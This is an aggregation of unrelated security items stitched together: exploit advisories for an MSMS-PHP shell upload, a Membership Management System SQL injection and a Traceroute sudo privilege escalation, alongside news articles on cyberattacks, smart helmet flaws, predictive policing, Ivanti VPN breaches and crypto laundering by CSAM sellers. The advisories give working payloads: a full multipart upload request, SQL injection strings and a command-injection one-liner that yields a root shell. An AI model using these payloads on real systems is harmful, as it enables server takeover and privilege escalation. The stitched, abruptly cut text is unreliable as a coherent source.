MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

A global network of violent predators is hiding in plain sight, targeting children on major platforms, grooming them, and extorting them to commit horrific acts of abuse.

There Are Dark Corners of the Internet. Then There's 764

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Membership Management System 1.0 SQL Injection

Cyberattacks and criminal scams can impact anyone. But communities of color and other marginalized groups are often disproportionately impacted and lack the support to better protect themselves.

Talk about the promise and the peril of artificial intelligence is everywhere these days. But for many low-income families, communities of color, military veterans, people with disabilities, and immigrant communities, AI is a back-burner issue. Their day-to-day worries revolve around taking care of their health, navigating the economy, seeking educational opportunities, and upholding democracy. But their worries are also being amplified through advanced, persistent, and targeted cyberattacks.

Cyber operations are relentless, growing in scale, and exacerbate existing inequalities in health care, economic opportunities, education access, and democratic participation. And when these pillars of society become unstable, the consequences ripple through national and global communities. Collectively, cyberattacks have severe and long-term impacts on communities already on the margins of society. These attacks are not just a technological concern—they represent a growing civil rights crisis, disproportionately dismantling the safety and security for vulnerable groups and reinforcing systemic barriers of racism and classism. The United States currently lacks an assertive response to deter the continued weaponization of cyber operations and to secure digital access, equity, participation, and safety for marginalized communities.

Health Care

Cyberattacks on hospitals and health care organizations more than doubled in 2023, impacting over 39 million people in the first half of 2023. A late-November cyberattack at the Hillcrest Medical Center in Tulsa, Oklahoma, led to a system-wide shutdown, causing ambulances to reroute and life-saving surgeries to be canceled. These attacks impact patients' reliance and trust in health care systems, which may make them more hesitant to seek care, further endangering the health and safety of already vulnerable populations.

The scale and prevalence of these attacks weaken public trust—especially among communities of color who already have deep-rooted fears about our health care systems. The now-condemned Untreated Syphilis Study at Tuskegee, where researchers denied treatment to Black men without their knowledge or consent in order to observe the disease’s long-term effects, only ended 52 years ago. However, the study created a legacy of suspicion and mistrust of the medical community that continues today, leading to a decrease in the life expectancy of Black men and lower participation in medical research among Black Americans. The compounding fact that Black women are three to four times more likely, and American Indian and Alaska Native women are two times more likely, to die from pregnancy-related causes than White women only adds to mistrust.

Erosion of trust also extends to low-income people. Over a million young patients at Lurie Children's Surgical Foundation in Chicago had their names, Social Security numbers, and dates of birth exposed in an August 2023 breach. The hospital treats more children insured by Medicaid—an economic hardship indicator—than any other hospital in Illinois. Once breached, a child’s personal data could be used to commit identity fraud, which severely damages credit, jeopardizes education financial aid, and denies employment opportunities. While difficult for anyone, children from financially insecure households are least equipped to absorb or overcome these economic setbacks.

Economic Opportunity

Identity theft is not the only way cyberattacks exploit hard times. Cyberattacks also go after financially vulnerable individuals—and they are getting more sophisticated. In Maryland, hackers targeted Electronic Benefits Transfer cards—used to provide public assistance funds for food—to steal more than $2 million in 2022 and the first months of 2023. That’s an increase of more than 2,100 percent compared to the $90,000 of EBT funds stolen in 2021. Maryland’s income limit to qualify for the government’s food assistance program is $39,000 for a family of four in 2024, and only if they have less than $2,001 in their bank account. Unlike a credit card, which legally protects against fraudulent charges, EBT cards don’t have fraud protections. Efforts to help the victims are riddled with red tape: reimbursements are capped at two months of stolen benefits, and only within a specific time period.

Cybercriminals also target vulnerable populations, especially within older age groups. Since the last reporting in 2019, 40 percent of Asian Pacific Islander Desi Americans (APIDAs) aged 50 and older have reported experiencing financial fraud, with one-third of those victims losing an average of $15,000. From 2018 through 2023, Chinese Embassy Scam robocalls delivered automated messages and combined caller ID spoofing, a method where scammers disguise their phone display information, targeting Chinese immigrant communities. This resulted in more than 350 victims across 27 US states and financial losses averaging $164,000 per victim for a total of $40 million. And for five years, this scam just kept going. As these scams evolve, groups now face increasingly sophisticated AI-assisted calls, where scammers use technology to convincingly mimic loved ones' voices, further exploiting vulnerabilities, particularly among older adults—many of whom live on fixed incomes or live with economic insecurity.

While social movements have fought to promote economic equity, cybercriminals undermine these efforts by exacerbating financial vulnerabilities. From the 1960s La Causa movement advocating for migrant worker rights to the Poor People’s Campaign mobilizing across racial lines, activists have worked to dismantle systemic barriers, end poverty, and push for fair wages. Current attacks on financial systems, however, often target the very groups these movements aim to empower—perpetuating the disparities that advocates have fought against. Digital scams and fraud incidents disproportionately impact those least equipped to recover—including natural disaster victims, people with disabilities, older adults, young adults, military veterans, immigrant communities, and lower-income families. By stealing essential resources, cybercriminals compound hardships for those already struggling to make ends meet or those experiencing some of the worst hardships of their lives—pushing groups deeper into the margins.

Education Access

Education is another area where cybercrime has soared. One of the worst hacks of 2023 exploited a flaw in a file transfer software called MOVEit that multiple government entities, nonprofits, and other organizations use to manage data across systems. This includes the National Student Clearinghouse, which serves 3,600 colleges, representing 97 percent of college students in the US, to provide verification information to academic institutions, student loan providers, and employers.

Attacks on educational systems are devastating at all levels. A top target for ransomware attacks last year was K-12 schools. While the complete data is not available yet, by August 2023 ransomware attacks (where hackers lock an organization’s data and demand payment for its release) hit at least 48 US school districts—three more than in all of 2022. Schools already have limited resources, and cybersecurity can be expensive, so many have few defenses against sophisticated cyberattacks.

The Hidden Injustice of Cyberattacks

By Deeba Ahmed
According to cybersecurity firm Pen Test Partners, Livall’s smart helmets had an inherent flaw that could lead to…
This is a post from HackRead.com Read the original post: Smart Helmets Flaw Exposed Millions to Risk of Hacking and Surveillance

According to cybersecurity firm Pen Test Partners, Livall’s smart helmets had an inherent flaw that could lead to the leaking of critical, sensitive user information including location data.

The emergence of smart ski tech like Oakley/Recon goggles and smart ski helmet speakers have made skiing or biking a lot more fun but the dangers posed by internet-connected devices cannot be overlooked.

The latest security and privacy issues with smart helmets and other internet-connected gadgets were highlighted in research conducted by UK-based cybersecurity testing firm Pen Test Partners (PTP).

According to PTP, Livall’s smart helmets have an inherent security vulnerability that can lead to the leaking of critical, sensitive user data. For your information, Livall is famous for smart ski and bike helmets. Its smart helmets allow groups of skiers/bikers to communicate using the built-in speaker and microphone and share their location-related information in a group using any of the two Livall’s smartphone apps. One of the apps is for bike riders and the other for skiers, both collectively boasting around a million users.

However, according to Pen Test Partners’ researcher Ken Munro, the security vulnerability allows easy access to any group’s audio chats and location data. Livall’s apps for group audio chat and location sharing require users to be part of the same friends’ group, which can only be accessed using a six-digit numeric code. Munro stressed that the code is not random enough, allowing anyone to access any of the 1 million possible group chat codes.

“That 6-digit group code simply isn’t random enough. We could brute force all group IDs in a matter of minutes,” Munro wrote in the **blog post**.

This is where the vulnerability occurs. A group code can be entered automatically, allowing a user to join without alerting other members. This allows access to users’ location and audio communications. A rogue group user can only be detected if a legitimate user checks on group members.

****No Response from Livall to PTP****

Here, it is worth noting that according to researchers, several attempts were made to contact Livall, but no response was received. Then, PTP contacted Tech Crunch’s Zack Whittaker on 22 January to get in touch with Livall.

Whittaker agreed to discuss issues with their bike app, which had more flaws than the ski app. Livall’s CEO responded to Whittaker on 23 January and asked for two weeks to fix the problem. On 5 February, Whittaker was informed that the app was updated with stronger join codes.

Meanwhile, IoT device users must exercise caution as the trend of hijacking smart devices and apps is gaining momentum alarmingly quickly. In a recent report, **Hackread.com highlighted** another shocking discovery by Pen Test Partners, revealing a critical issue in the Airbus Flysmart+ Manager suite.

The app, developed by Airbus-owned IT services company NAVBLUE, had a disabled security control, allowing it to communicate with servers using insecure methods, potentially allowing an attacker to modify aircraft performance data or adjust airport information. Researchers informed Airbus about the flaw in June 2022, and it was fixed in February 2023.

****Experts Weigh In****

To gain insights into this issue and vulnerabilities in IoT devices, we reached out to **Adam Pilton**, a Cybersecurity Consultant at **CyberSmart** and former Detective Sergeant who investigated cybercrime at Dorset, England Police.

“The vulnerabilities discovered in Livall helmets have been addressed, but this research prompts crucial considerations. Manufacturers must ensure strong security measures, yet users must also understand the risks of granting permissions to apps, said Adam.

“Whilst leading the Police Cyber Crime Team I saw many cases in which simple flaws such as this one, were exposed,” Adam explained. “This led to breaches of privacy, enabled crimes such as domestic abuse and often was the first step in a series of events that led to a significant cyber attack.”

“Timely responses from manufacturers are vital, as delays can exacerbate security risks. Collaboration and transparency are essential in the field of cybersecurity,” he advised.

****RELATED ARTICLES****

1.  **Reporter Gets His Email Hacked on The Plane**
2.  **Warning as small planes found vulnerable to hacking**
3.  **Smart alarm flaw let hackers track and turn off car engine**
4.  **Smartwatch flaw lets hackers overdose dementia patients**
5.  **Critical Flaws Found in Devices That Provide WiFi on Airplanes**

Smart Helmets Flaw Exposed Millions to Risk of Hacking and Surveillance

Members of Congress say the DOJ is funding the use of AI tools that further discriminatory policing practices. They're demanding higher standards for federal grants.

The United States Department of Justice has failed to convince a group of US lawmakers that state and local police agencies aren't awarded federal grants to buy AI-based “policing” tools known to be inaccurate, if not prone to exacerbating biases long observed in US police forces.

Seven members of Congress wrote in a letter to the DOJ, first obtained by WIRED, that the information they pried loose from the agency had only served to inflame their concerns about the DOJ’s police grant program. Nothing in its responses so far, the lawmakers said, indicates the government has bothered to investigate whether departments awarded grants bought discriminatory policing software.

“We urge you to halt all Department of Justice grants for predictive policing systems until the DOJ can ensure that grant recipients will not use such systems in ways that have a discriminatory impact,” the letter reads. The Justice Department previously acknowledged that it had not kept track of whether police departments were using the funding, awarded under the Edward Byrne Memorial Justice Assistance Grant Program, to purchase so-called predictive policing tools.

Led by Senator Ron Wyden, a Democrat of Oregon, the lawmakers say the DOJ is required by law to “periodically review” whether grant recipients comply with Title VI of the nation’s Civil Rights Act. The DOJ is patently forbidden, they explain, from funding programs shown to discriminate on the basis of race, ethnicity, or national origin, whether that outcome is intentional or not.

Independent investigations in the press have found that popular “predictive” policing tools trained on historical crime data often replicate long-held biases, offering law enforcement, at best, a veneer of scientific legitimacy while perpetuating the over-policing of predominantly Black and Latino neighborhoods. An October headline from The Markup states bluntly: “Predictive Policing Software Terrible At Predicting Crimes.” The story recounts how researchers at the publication recently examined 23,631 police crime predictions—and found them accurate roughly 1 percent of the time.

“Predictive policing systems rely on historical data distorted by falsified crime reports and disproportionate arrests of people of color,” Wyden and the other lawmakers wrote, predicting—as many researchers have—that the technology serves only to create “dangerous” feedback loops. The statement notes that “biased predictions are used to justify disproportionate stops and arrests in minority neighborhoods,” further biasing statistics on where crimes occur.

Senators Jeffrey Merkley, Ed Markey, Alex Padilla, Peter Welch, and John Fetterman also cosigned the letter, as did Representative Yvette Clarke.

The lawmakers have requested that an upcoming presidential report on policing and artificial intelligence investigate the use of predictive policing tools in the US. “The report should assess the accuracy and precision of predictive policing models across protected classes, their interpretability, and their validity,” to include, they added, “any limits on assessing their risks posed by a lack of transparency from the companies developing them.”

Should the DOJ wish to continue funding the technology after this assessment, the lawmakers say, it should at least establish “evidence standards” to determine which predictive models are discriminatory—and then reject funding for all those that fail to live up to them.

US Lawmakers Tell DOJ to Quit Blindly Funding ‘Predictive’ Police Tools

In Traceroute versions 2.0.12 through to 2.1.2, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts include tcptraceroute, tracepath, traceproto, and traceroute-nanog. Version 2.1.3 addresses this issue.

    Description:In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.Additional infomation:CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command. The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting "cap_net_raw" capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.Exploitation:sudo tcptraceroute localhost ";bash"

Traceroute 2.1.2 Privilege Escalation

Plus: Microsoft says attackers accessed employee emails, Walmart fails to stop gift card fraud, “pig butchering” scams fuel violence in Myanmar, and more.

A major coordinated disclosure this week called attention to the importance of prioritizing security in the design of graphics processing units (GPUs). Researchers published details about the “LeftoverLocals” vulnerability in multiple brands and models of mainstream GPUs—including Apple, Qualcomm, and AMD chips—that could be exploited to steal sensitive data, such as responses from AI systems. Meanwhile, new findings from the cryptocurrency tracing firm Chainalysis show how stablecoins that are tied to the value of the US dollar were instrumental in cryptocurrency-based scams and sanctions evasion last year.

The US Federal Trade Commission reached a settlement earlier this month with the data broker X-Mode (now Outlogic) over its sale of location data gathered from phone apps to the US government and other clients. While the action was hailed by some as a historic privacy win, it also illustrates the limitations of the FTC and the US government's data privacy enforcement power and the ways in which many companies can avoid scrutiny and consequences for failing to protect consumers' data.

The US internet provider Comcast Xfinity may gather data about customers' personal lives for personalized ads, including information about their political beliefs, race, and sexual orientation. If you're a customer, we've got advice for opting out—to the extent that's possible. And if you need a good long read for the weekend, we have the story of how a 27-year-old cryptography graduate student systematically debunked the myth that bitcoin transactions are anonymous. The piece is an excerpt from WIRED writer Andy Greenberg's nonfiction thriller _Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency_, out this week in paperback.

And there's more. Each week, we round up the security and privacy news we didn’t break or cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

On Friday, the US Cybersecurity and Infrastructure Security Agency issued an emergency directive requiring federal agencies to patch two vulnerabilities that are being actively exploited in the popular VPN appliances Ivanti Connect Secure and Policy Secure. CISA's executive assistant director, Eric Goldstein, told reporters that CISA has notified every federal agency that is running a version of the products, amounting to “around” 15 agencies that have applied mitigations. “We are not assessing a significant risk to the federal enterprise, but we know that risk is not zero,” Goldstein said. He added that investigations are ongoing into whether any federal agencies have been compromised in the attackers' mass exploitation spree.

Analysis indicates that multiple actors have been hunting for and exploiting vulnerable Ivanti devices to gain access to organizations' networks around the world. The activity began in December 2023, but it has ramped up in recent days as word of the vulnerabilities and a proof of concept have emerged. Researchers from the security firm Volexity say that at least 1,700 Connect Secure devices have been compromised overall. Both Volexity and Mandiant see evidence that at least some of the exploitation activity is motivated by espionage. CISA's Goldstein said on Friday that the US government has not yet attributed any of the exploitation activity to particular actors, but that “exploitation of these products would be consistent with what we have seen from PRC \[People's Republic of China\] actors like Volt Typhoon in the past.”

Ivanti Connect Secure is a rebrand of the Ivanti product series known as Pulse Secure. Vulnerabilities in that VPN platform were notoriously exploited in a rash of high-profile digital breaches in 2021 carried out by Chinese state-backed hackers.

Microsoft said on Friday that it detected a system intrusion on January 12 that it is attributing to the Russian state-backed actor known as Midnight Blizzard or APT 29 Cozy Bear. The company says it has fully remediated the breach, which began in November 2023 and used “password spraying” attacks to compromise historic system test accounts that, in some cases, then allowed the attacker to infiltrate “a very small percentage of Microsoft corporate email accounts, including members of our senior leadership team and employees in our cybersecurity, legal, and other functions.” With this access, Cozy Bear hackers were then able to exfiltrate “some emails and attached documents.” Microsoft notes that the attackers appeared to be seeking information about Microsoft's investigations into the group itself. “The attack was not the result of a vulnerability in Microsoft products or services,” the company wrote. “To date, there is no evidence that the threat actor had any access to customer environments, production systems, source code, or AI systems. We will notify customers if any action is required.”

Gift card scams in which attackers trick victims into purchasing gift cards for them are a long-standing issue, but new reporting from ProPublica shows how Walmart has been particularly remiss in addressing the problem. For a decade, the retailer has skirted pressure from both regulators and law enforcement to more closely scrutinize gift card sales and money transfers and expand employee training that could save customers from being tricked and exploited by bad actors. ProPublica conducted dozens of interviews and reviewed internal documents, court filings, and public records in its analysis.

“They were concerned about the bucks. That’s all,” Nick Alicea, a former fraud team leader for the US Postal Inspection Service, told ProPublica. Walmart defended its efforts, claiming that it has stopped more than $700 million in suspicious money transfers and refunded $4 million to victims of gift card fraud. “Walmart offers these financial services while working hard to keep our customers safe from third-party fraudsters,” the company said in a statement. “We have a robust anti-fraud program and other controls to help stop scammers and other criminals who may use the financial services we offer to harm our customers.”

As rebel groups in Myanmar violently oppose the country's military government, the human trafficking and abuse fueling pig butchering scams is exacerbating the conflict. The scams have exploded in recent years, carried out not just by bad actors, but by a workforce of forced laborers who have often been kidnapped and are being held against their will. In one case this fall, a collection of rebel groups in Myanmar known as the Three Brotherhood Alliance took control of 100 military outposts in the country's northern Shan state and seized several towns along the border with China, vowing to "eradicate telecom fraud, scam dens and their patrons nationwide, including in areas along the China-Myanmar border.”

The UN estimates that there may be as many as 100,000 people held in scam centers in Cambodia and 120,000 in Myanmar. “I’ve worked in this space for over 20 years and to be honest, we’ve never seen anything like what we’re seeing now in Southeast Asia in terms of the sheer numbers of people,” Rebecca Miller, regional program director for human trafficking at the UN Office on Drugs and Crime told Vox.

In a new investigation, _Consumer Reports_ and The Markup crowdsourced three years of archived Facebook data from 709 users of the social network to assess which data brokers and other organizations are tracking and monitoring them. In analyzing the data, reporters found that a total of 186,892 companies sent data about the 709 individuals to Facebook. On average, each of those users had information sent to Facebook about them by 2,230 companies. The number varied, though. Some users had less than the average while others had more than 7,000 companies tracking them and providing information to the social network.

US Agencies Urged to Patch Ivanti VPNs That Are Actively Being Hacked

Once, drug dealers and money launderers saw cryptocurrency as perfectly untraceable. Then a grad student named Sarah Meiklejohn proved them all wrong—and set the stage for a decade-long crackdown.

How a 27-Year-Old Codebreaker Busted the Myth of Bitcoin’s Anonymity

Crypto tracing firm Chainalysis found that sellers of child sexual abuse materials are successfully using “mixers” and “privacy coins” like Monero to launder their profits and evade law enforcement.

For those who trade in child sexual exploitation images and videos in the darkest recesses of the internet, cryptocurrency has been both a powerful tool and a treacherous one. Bitcoin, for instance, has allowed denizens of that criminal underground to buy and sell their wares with no involvement from a bank or payment processor that might reveal their activities to law enforcement. But the public and surprisingly traceable transactions recorded in Bitcoin's blockchain have sometimes led financial investigators directly to pedophiles’ doorsteps.

Now, after years of evolution in that grim cat-and-mouse game, new evidence suggests that online vendors of what was once commonly called “child porn” are learning to use cryptocurrency with significantly more skill and stealth—and that it's helping them survive longer in the internet's most abusive industry.

Today, as part of an annual crime report, cryptocurrency tracing firm Chainalysis revealed new research that analyzed blockchains to measure the changing scale and sophistication of the cryptocurrency-based sale of child sexual abuse materials, or CSAM, over the past four years. Total revenue from CSAM sold for cryptocurrency has actually gone down since 2021, Chainalysis found, along with the number of new CSAM sellers accepting crypto. But the sophistication of crypto-based CSAM sales has been increasing. More and more, Chainalysis discovered, sellers of CSAM are using privacy tools like “mixers” and “privacy coins” that obfuscate their money trails across blockchains.

Perhaps because of that increased savvy, the company found that CSAM vendors active in 2023 persisted online—and evaded law enforcement—for a longer time than in any previous year, and about 57 percent longer than even in 2022. “Growing sophistication makes identification harder. It makes tracing harder, it makes prosecution harder, and it makes rescuing victims harder,” says Eric Jardine, the researcher who led the Chainalysis study. “So that sophistication dimension is probably the worst one you could see increasing over time.”

Better Stealth, Longer Criminal Lifespans

Scouring blockchains, Chainalysis researchers analyzed around 400 cryptocurrency wallets of CSAM sellers and more than 10,000 buyers who sent funds to them over the past four years. Their most disturbing finding in that broad economic study was that crypto-based CSAM sellers seem to have a longer lifespan online than ever, suggesting a kind of relative impunity. On average, CSAM vendors who were active in 2023 remained online for 884 days, compared with 560 days for those active in 2022 and just 112 days in 2020.

To explain that new longevity for some of the most harmful actors on the internet, Chainalysis points to how CSAM vendors are increasingly laundering their proceeds with cryptocurrency mixers—services that blend users' funds to make tracing more difficult—such as ChipMixer and Sinbad. (US and German law enforcement shut down ChipMixer in March 2023, but Sinbad remains online despite facing US sanctions for money laundering.) In 2023, Chainalysis found that about 46 percent of CSAM vendors used mixers, up from around 22 percent in 2020.

Chainalysis also found that CSAM vendors are increasingly using “instant exchanger” services that often collect little or no identifying information on traders and allow them to swap bitcoin for cryptocurrencies like Monero and Zcash—"privacy coins" designed to obfuscate or encrypt their blockchains to make tracing their cash-outs of profits far more difficult. Chainalysis’ Jardine says that Monero in particular seems to be gaining popularity among CSAM purveyors. In the company's investigations, Chainalysis has seen it used repeatedly by CSAM sellers laundering funds through instant exchangers, and in multiple cases it has also seen CSAM forums post Monero addresses to solicit donations. While the instant exchangers did offer other cryptocurrencies, including the privacy coin Zcash, Chainalysis’ report states that “we believe Monero to be the currency of choice for laundering via instant exchangers.”

Chainalysis’s chart of how long CSAM vendors who were active in each year had persisted online, suggesting that their resilience to takedown has steadily increased over time.

Chainalysis

